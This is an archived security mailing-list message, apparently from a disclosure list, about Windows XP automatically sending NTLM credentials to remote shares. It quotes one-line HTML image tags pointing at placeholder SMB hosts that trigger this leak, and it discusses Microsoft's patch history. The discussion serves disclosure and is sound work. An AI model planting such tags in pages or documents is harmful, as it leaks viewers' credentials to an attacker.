lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY22-F25BSXaD8z9tT0000c01f@hotmail.com> From: urity_friday at hotmail.com (Hidenobu Seki) Subject: Automatically passing NTLM authentication credentials on Windows XP >From: 3APA3A <3APA3A@...URITY.NNOV.RU> > >This problem is known since at least 1997 and still can be exploited >with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word >document. It is not true. They are different problems that happen the same phenomenon. Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test> still works. Tell me why Microsoft issued patches for MS00-067(KB272743) and MS01-001(KB282132) but not for "img src". > 3APA3A or all Kind regards, Urity _________________________________________________________________ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail